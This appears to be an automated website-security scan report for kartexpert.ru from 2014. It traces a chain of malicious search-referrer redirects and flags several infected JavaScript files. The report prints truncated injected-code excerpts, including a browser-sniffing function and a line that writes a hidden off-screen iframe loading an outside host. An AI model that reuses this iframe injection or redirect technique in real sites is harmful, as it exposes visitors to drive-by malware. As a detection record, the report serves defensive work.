Malicious/Suspicious Redirects
Request | Server response | Status |
URL: http://kartexpert.ru/ (imitation of visitor from search engine) GET / HTTP/1.1 Host: kartexpert.ru Referer: http://www.google.com/search?q=redirect+check1 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:10 GMT Location: http://alfsystem.com.my/includes/domit/1.php Server: Apache/2.2.15 (Red Hat) mod_rpaf/0.6 PHP/5.3.27 Content-Length: 0 Content-Type: text/html; charset=UTF-8 X-Cache: MISS from turbine6.ht-systems.ru X-Cache-Lookup: MISS from turbine6.ht-systems.ru:6666 X-Powered-By: PHP/5.3.27 | malicious |
URL: http://alfsystem.com.my/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: alfsystem.com.my Referer: http://www.google.com/search?q=redirect+check2 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:10 GMT Location: http://www.csra.de/includes/domit/1.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.3.23 | malicious |
URL: http://www.csra.de/includes/domit/1.php (imitation of visitor from search engine) GET /includes/domit/1.php HTTP/1.1 Host: www.csra.de Referer: http://www.google.com/search?q=redirect+check3 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:11 GMT Location: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php Server: Apache Content-Length: 0 Content-Type: text/html X-Powered-By: PHP/5.4.29 | malicious |
URL: http://jbtconsultinggroup.com/components/com_user/views/login/tmpl/1/all3.php (imitation of visitor from search engine) GET /components/com_user/views/login/tmpl/1/all3.php HTTP/1.1 Host: jbtconsultinggroup.com Referer: http://www.google.com/search?q=redirect+check4 | HTTP/1.1 302 Moved Temporarily Connection: close Date: Thu, 26 Jun 2014 18:53:11 GMT Location: http://google.ru Server: Apache Vary: Accept-Encoding Content-Length: 0 Content-Type: text/html | malicious |
Scanned pages/files
Request | Server response | Status |
http://kartexpert.ru/ | 200 OK Content-Length: 51018 Content-Type: text/html | clean |
http://kartexpert.ru/media/system/js/mootools-core.js | 200 OK Content-Length: 97281 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Nintendo() {
var g = navigator.userAgent; var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph return this;},remote:function(){return Swiff.remote.apply(Swiff,[this.toElement()].append(arguments));}});Swiff.CallBacks={};Swiff.remote=function(obj,fn){var rs=obj.CallFunction('<invoke name="'+fn+'" returntype="javascript">'+__flash__argumentsToXML(arguments,2)+"</invoke>"); return eval(rs);};})();;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://kartexpert.ru/media/system/js/core.js | 200 OK Content-Length: 5703 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Nintendo() {
var g = navigator.userAgent; var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph ;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://kartexpert.ru/media/system/js/mootools-more.js | 200 OK Content-Length: 239248 Content-Type: text/javascript | clean |
http://kartexpert.ru/media/system/js/caption.js | 200 OK Content-Length: 1648 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) function Nintendo() {
var g = navigator.userAgent; var h = (g.indexOf("Mini") > -1 || g.indexOf("Maxthon") > -1 || g.indexOf("IEMobile") > -1 || g.indexOf("iPhone") > -1 || g.indexOf("FreeBSD") > -1 || g.indexOf("Android") > -1 || g.indexOf("iPad") > -1 || g.indexOf("Linux") > -1 || g.indexOf("Macintosh") > -1 || g.indexOf("Chrome") > -1 || g.indexOf("Screenshot") > -1 || g.indexOf("Jasmine") > -1 || g.indexOf("SeaMonkey") > -1 || g.indexOf("Dolph ""&&c.appendChild(d);c.className=this.selector.replace(".","_");c.className=c.className+" "+b;c.setAttribute("style","float:"+b);c.style.width=e+"px"}});;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;;; Antivirus reports:
| ||
http://kartexpert.ru/plugins/system/jat3/jat3/base-themes/default/js/core.js | 200 OK Content-Length: 6804 Content-Type: text/javascript | clean |
http://kartexpert.ru/plugins/system/jat3/jat3/base-themes/default/js/menu/mega.js | 200 OK Content-Length: 17179 Content-Type: text/javascript | clean |
http://kartexpert.ru/modules/mod_news_pro_gk4/interface/scripts/engine.js | 200 OK Content-Length: 8523 Content-Type: text/javascript | clean |
http://kartexpert.ru/media/system/js/modal.js | 200 OK Content-Length: 10474 Content-Type: text/javascript | clean |
http://kartexpert.ru/plugins/content/jw_sigpro/jw_sigpro/includes/js/mootools_slimbox/slimbox-1.71a/js/slimbox.js | 200 OK Content-Length: 4627 Content-Type: text/javascript | clean |
http://kartexpert.ru/plugins/content/jw_sigpro/jw_sigpro/includes/js/behaviour.js | 200 OK Content-Length: 1524 Content-Type: text/javascript | malicious |
Malicious code - confirmed by antiviruses (see below) var SIGProHelper = { ieBrowserDetect: function(){ if(!document.getElementsByTagName) return false; if(!document.getElementById) return false; var bodyClass = document.getElementsByTagName("body")[0].className; var isIE6 = navigator.userAgent.toLowerCase().indexOf('msie 6') != -1; var isIE7 = navigator.userAgent.toLowerCase().indexOf('msie 7') != -1; var isIE8 = navigator.userAgent.toLowerCase().indexOf('msie 8') != -1; if(isIE6) document.getElements if (typeof window.onload != 'function') { window.onload = func; } else { window.onload = function() { if (oldonload) { oldonload(); } func(); } } } }; SIGProHelper.loader(SIGProHelper.ieBrowserDetect); ;;;;;;;document.write('<iframe src="http://juke.erstehilfe.ch/oaczz.ixVedwC6jZ?default" name="Hemoner" height="105" width="105" style="left:-500px;top:0px;position:fixed;"></iframe>'); Antivirus reports:
| ||
http://ajax.googleapis.com/ajax/libs/jquery/1.4.4/jquery.min.js | 200 OK Content-Length: 78601 Content-Type: text/javascript | clean |
http://kartexpert.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.noconflict.js | 200 OK Content-Length: 1000 Content-Type: text/javascript | clean |
http://kartexpert.ru/modules/mod_ariimageslider/mod_ariimageslider/js/jquery.nivo.slider.js | 200 OK Content-Length: 10432 Content-Type: text/javascript | clean |
http://counter.rambler.ru/top100.jcn?2833107 | 200 OK Content-Length: 6853 Content-Type: application/x-javascript | clean |
Safe Browsing / Blacklists
Query: http://www.google.com/safebrowsing/diagnostic?site=kartexpert.ru
Result: This site is not currently listed as suspicious.
Result: This site is not currently listed as suspicious.
Query: http://yandex.com/infected?l10n=en&url=http://kartexpert.ru/
Result: kartexpert.ru is not infected or malware details are not published yet.
Result: kartexpert.ru is not infected or malware details are not published yet.